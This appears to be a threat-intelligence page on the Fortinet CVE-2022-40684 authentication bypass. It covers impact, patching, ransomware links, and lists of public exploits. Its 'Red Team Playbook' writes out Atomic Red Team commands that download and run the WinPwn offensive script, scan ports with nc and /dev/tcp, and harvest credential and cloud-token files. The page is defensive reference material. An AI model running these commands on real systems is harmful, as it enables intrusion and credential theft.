CVE-2022-40684
Overview
This vulnerability is an authentication bypass affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager administrative interfaces. The root cause lies in improper validation of HTTP/HTTPS requests, allowing an attacker to exploit alternate request paths or channels to circumvent authentication controls. The flaw specifically impacts the handling of API endpoints related to administrative configuration.
Vulnerability Description
An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
Impact
An unauthenticated attacker can exploit this vulnerability to gain unauthorized administrative access to affected devices. This access enables viewing and modifying sensitive configuration data, including administrative user settings, potentially leading to full system compromise. No prior authentication or user interaction is required, making exploitation straightforward and enabling attackers to control network security infrastructure, resulting in significant operational and data security risks.
Solution
Fortinet has released security updates addressing this authentication bypass in FortiOS, FortiProxy, and FortiSwitchManager. Users should upgrade to FortiOS versions later than 7.2.1 or 7.0.6, FortiProxy versions beyond 7.2.0 and 7.0.6, and FortiSwitchManager versions above 7.2.0 and 7.0.0 as specified in Fortinet's advisory FG-IR-22-377 (https://fortiguard.com/psirt/FG-IR-22-377). Administrators are advised to apply these patches promptly and review device configurations to ensure no unauthorized changes occurred prior to patching.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
akira
|
1529 | ransomware.live |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Fortinet's FortiOS, FortiProxy, and FortiSwitchManager products represents a critical authentication bypass issue that allows unauthenticated attackers to exploit the administrative interfaces of these systems. This flaw arises from the improper validation of authentication tokens, enabling attackers to send specially crafted HTTP or HTTPS requests that can bypass security measures. The affected versions include FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, as well as FortiProxy and FortiSwitchManager within the same version ranges. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating that it poses a significant risk to organizations utilizing these products.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. By leveraging the authentication bypass, an attacker can gain unauthorized access to the administrative interfaces of the affected products. This could involve sending crafted requests that manipulate the underlying protocols, allowing the attacker to perform administrative functions without needing valid credentials. Scenarios may include altering configurations, accessing sensitive data, or even deploying malicious payloads that could further compromise the network. The simplicity of the attack, combined with the potential for significant control over critical network infrastructure, makes this vulnerability especially dangerous.
The real-world impact of this vulnerability can be profound for organizations that rely on Fortinet's products for their security infrastructure. An attacker gaining administrative access could lead to data breaches, service disruptions, and unauthorized changes to security policies, all of which could have severe financial and reputational repercussions. For businesses, the risk extends beyond immediate damage; regulatory compliance issues may arise if sensitive data is exposed or if the organization fails to protect its systems adequately. The potential for widespread exploitation means that organizations must take this threat seriously and act swiftly to mitigate the risks.
To detect and mitigate the threat posed by this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected systems is crucial, as Fortinet has released updates to address this flaw. Additionally, monitoring network traffic for unusual patterns or unauthorized access attempts can help identify potential exploitation in real-time. Employing intrusion detection systems (IDS) and conducting regular security audits can further bolster defenses. Organizations should also consider implementing strict access controls and segmentation within their networks to limit the potential impact of an attacker gaining unauthorized access.
In conclusion, the authentication bypass vulnerability in Fortinet's products presents a significant threat to network security. Its ease of exploitation and potential for severe consequences necessitate immediate attention from organizations using these systems. By understanding the technical details, potential attack vectors, and real-world implications, as well as employing robust detection and mitigation strategies, organizations can better protect themselves against this critical vulnerability. Proactive measures and a commitment to security best practices will be essential in safeguarding against the risks associated with this and similar vulnerabilities in the future.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2022-40684, indicating continued exploitation attempts targeting Fortinet FortiOS, FortiProxy, and FortiSwitchManager. This uptick, while modest, underscores persistent adversary interest and operational use, particularly by ransomware groups such as Akira, which remain actively associated with campaigns leveraging this vulnerability. The availability of multiple new proof-of-concept exploits on public repositories has likely contributed to sustained attacker engagement, lowering the barrier for exploitation and facilitating broader targeting. Although the EPSS score remains high and stable, the incremental rise in detection signals that threat actors are maintaining or marginally expanding their operational tempo rather than diminishing activity. For defenders, this means that vigilance must be sustained as the vulnerability continues to be a viable vector for unauthorized administrative access and subsequent ransomware deployment. The threat level remains critical, with the evolving exploit landscape and ransomware associations reinforcing the urgency for ongoing monitoring and response readiness.
Update 2 — June 21, 2026
CSURFACE threat intelligence has identified a modest increase in exploitation attempts targeting CVE-2022-40684, reflected by a slight rise in detection signals and an elevated EPSS score nearing certainty of exploitation. This subtle uptick indicates sustained adversary interest, with threat actors continuing to leverage this critical authentication bypass vulnerability to gain unauthorized administrative access. The persistence of ransomware groups such as Akira in campaigns exploiting this flaw underscores the ongoing operational relevance of this vulnerability. Additionally, the emergence of multiple new proof-of-concept exploits circulating publicly enhances the accessibility of attack tools, potentially lowering the barrier for less sophisticated actors to conduct impactful intrusions. For defenders, this evolving landscape signals that the threat remains active and adaptive, necessitating continued vigilance. While the increase is not yet characterized as a rapid surge, the trend confirms that exploitation activity is stable or incrementally growing, maintaining the vulnerability’s critical risk profile and its role as a vector for ransomware deployment.
Update 3 — July 06, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2022-40684, consistent with a gradual upward trend in attacker activity. This subtle rise in telemetry correlates with continued dissemination of multiple new proof-of-concept exploits, which remain publicly accessible and contribute to lowering the technical barrier for threat actors. Notably, ransomware groups associated with this vulnerability, such as Akira, continue to leverage it as a reliable vector for initial access, underscoring the persistent operational value of this flaw. While the overall exploit landscape remains stable without signs of a rapid surge, the incremental growth in activity reinforces the vulnerability’s critical status and sustained attractiveness to adversaries. For defenders, this evolving pattern signals the necessity to maintain heightened monitoring and response capabilities, as the threat remains active and capable of facilitating impactful intrusions.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortiproxy | All |
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiproxy | 7.2.0 |
cpe:2.3:a:fortinet:fortiproxy:7.2.0:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiswitchmanager | 7.0.0 |
cpe:2.3:a:fortinet:fortiswitchmanager:7.0.0:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiswitchmanager | 7.2.0 |
cpe:2.3:a:fortinet:fortiswitchmanager:7.2.0:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.
exploits/linux/http/fortinet_authentication_bypass_cve_2022_40684
|
Heyder Andrade <@HeyderAndrade>, Zach Hanley <@hacks_zach> | Unknown | unix, linux | View |
ExploitDB (2)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass | ub3rsick | remote | windows | - | View |
| FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass | Felipe Alcantara | webapps | multiple | - | View |
GitHub PoCs (29)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
horizon3ai/CVE-2022-40684
A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager
|
horizon3ai | 356 | 90 | 2022-10-13 | View |
|
carlosevieira/CVE-2022-40684
PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)
|
carlosevieira | 87 | 35 | 2022-10-13 | View |
|
arsolutioner/fortigate-belsen-leak
Research repository tracking affected IPs from the Fortigate CVE-2022-40684 configuration leak by Belsen Group
|
arsolutioner | 86 | 21 | 2025-01-16 | View |
|
Filiplain/Fortinet-PoC-Auth-Bypass
Bash PoC for Fortinet Auth Bypass - CVE-2022-40684
|
Filiplain | 16 | 4 | 2022-10-13 | View |
|
kljunowsky/CVE-2022-40684-POC
Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager
|
kljunowsky | 16 | 2 | 2022-10-13 | View |
|
TaroballzChen/CVE-2022-40684-metasploit-scanner
An authentication bypass using an alternate path or channel in Fortinet product
|
TaroballzChen | 14 | 3 | 2022-10-27 | View |
|
hughink/CVE-2022-40684
|
hughink | 11 | 3 | 2022-10-28 | View |
|
HAWA771/CVE-2022-40684
Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [ Mass Exploit ]
|
HAWA771 | 2 | 8 | 2022-10-15 | View |
|
qingsiweisan/CVE-2022-40684
|
qingsiweisan | 9 | 0 | 2022-10-26 | View |
|
Chocapikk/CVE-2022-40684
Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [ Mass Exploit ]
|
Chocapikk | 7 | 1 | 2022-10-15 | View |
|
secunnix/CVE-2022-40684
|
secunnix | 5 | 3 | 2022-10-14 | View |
|
z-bool/CVE-2022-40684
一键枚举所有用户名以及写入SSH公钥
|
z-bool | 5 | 1 | 2023-02-27 | View |
|
und3sc0n0c1d0/CVE-2022-40684
Utilities for exploiting vulnerability CVE-2022-40684 (FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass...
|
und3sc0n0c1d0 | 4 | 1 | 2022-10-19 | View |
|
xtwip/fortipwn
Forti CVE-2022-40684 enumeration script built in Rust
|
xtwip | 4 | 0 | 2022-10-16 | View |
|
gustavorobertux/gotigate
Exploit Fortigate - CVE-2022-40684
|
gustavorobertux | 2 | 0 | 2022-10-27 | View |
|
iveresk/CVE-2022-40684
|
iveresk | 1 | 1 | 2022-10-14 | View |
|
jsongmax/Fortinet-CVE-2022-40684
|
jsongmax | 2 | 0 | 2022-10-17 | View |
|
NeriaBasha/CVE-2022-40684
|
NeriaBasha | 1 | 0 | 2022-10-16 | View |
|
dkstar11q/CVE-2022-40684
Exploit for CVE-2022-40684 vulnerability
|
dkstar11q | 0 | 1 | 2023-01-28 | View |
|
ClickCyber/cve-2022-40684
exploit for CVE-2022-40684 Fortinet
|
ClickCyber | 0 | 1 | 2022-10-15 | View |
|
XalfiE/Fortigate-Belsen-Leak-Dump-CVE-2022-40684-
|
XalfiE | 1 | 0 | 2025-01-23 | View |
|
Anthony1500/CVE-2022-40684
|
Anthony1500 | 0 | 0 | 2023-09-14 | View |
|
Yami0x777/Belsen_Group-et-exploitation-de-la-CVE-2022-40684
|
Yami0x777 | 0 | 0 | 2025-02-10 | View |
|
puckiestyle/CVE-2022-40684
|
puckiestyle | 0 | 0 | 2022-10-17 | View |
|
notareaperbutDR34P3r/CVE-2022-40684-Rust
|
notareaperbutDR34P3r | 0 | 0 | 2023-01-17 | View |
|
pintukumar-sutradhar/fortigate-cve-2022-40684-tool
FortiGate CVE-2022-40684 assessment tool for user enumeration, configuration dump, and lab testing.
|
pintukumar-sutradhar | 0 | 0 | 2026-04-01 | View |
|
mhd108/CVE-2022-40684
|
mhd108 | 0 | 0 | 2022-10-14 | View |
|
niklasmato/fortileak-01-2025-Be
This repository contains informaion about the Fortigate firewall vulnerability (CVE-2022-40684) and affected data that w...
|
niklasmato | 0 | 0 | 2025-01-24 | View |
|
ccordeiro/CVE-2022-40684
PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)
|
ccordeiro | 0 | 0 | 2025-11-19 | View |
Ransomware Groups 1
Threat Feed
35 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-40684 |
| fortiguard.com |
GitHub CVE
|
https://fortiguard.com/psirt/FG-IR-22-377 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/169431/Fortinet-FortiOS-FortiProxy-FortiSwitchManager-Authentication-Bypass.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/171515/Fortinet-7.2.1-Authentication-Bypass.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-40684 |